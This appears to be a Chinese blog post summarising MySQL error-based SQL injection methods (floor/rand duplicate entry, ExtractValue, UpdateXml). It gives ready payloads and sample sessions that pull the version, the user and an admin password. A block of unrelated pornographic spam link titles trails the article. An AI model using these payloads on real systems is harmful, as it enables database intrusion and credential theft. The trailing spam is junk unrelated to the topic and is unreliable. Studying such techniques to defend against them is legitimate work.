< 返回

mysql 注入報錯利用方法總結

2024-07-05 11:18 作者:18723323311 閱讀量:4499

1、通過floor報錯

可以通過如下一些利用代碼

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

舉例如下:

首先進行正常查詢:

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

假如id輸入存在注入的話,可以通過如下語句進行報錯。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’

可以看到成功爆出了Mysql的版本,如果需要查詢其他數據,可以通過修改version()所在位置語句進行查詢。

例如我們需要查詢管理員用戶名和密碼:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

2、ExtractValue

測試語句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

實際測試過程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’

3、UpdateXml

測試語句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

實際測試過程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:root@localhost’

主站蜘蛛池模板: 日韩精品无码一区二区三区免费| 98精品国产高清在线看入口| 色费女人18毛片**在线| 日韩在线观看视频网站| 国产特级毛片aaaaaa| 亚洲伊人色欲综合网| xxxxx免费视频| 欧美一级亚洲一级| 国产熟女AA级毛片| 亚洲av无码久久忘忧草| 欧美日韩亚洲成色二本道三区| 极度另类极品另类| 国产成人综合久久亚洲精品| 久久香蕉精品视频| 青青草国产在线观看| 日本中文字幕有码在线视频| 国产一区二区三区免费看| 中文字幕人成无码免费视频| 精精国产XXXX视频在线| 小h片在线观看| 伊人久久久大香线蕉综合直播| 99在线精品一区二区三区| 欧美最猛性xxxxx69交| 国产精品午夜剧场| 久久精品国产精品亚洲毛片| 补课老师让我cao出水| 成人av鲁丝片一区二区免费| 免费在线观看污视频| 999影院成人在线影院| 欧美丰满熟妇XXXX性ppX人交 | 在线|一区二区三区四区| 亚洲欧洲日产国码www| 中文字幕日韩精品麻豆系列| 日韩国产欧美在线观看| 国产91精品一区二区麻豆亚洲| 一区二区三区中文字幕| 波多野结衣乱码中文字幕| 国产精品2019| 久久99精品久久久久子伦 | 国产三级精品三级在专区| 三色堂明星合成论坛|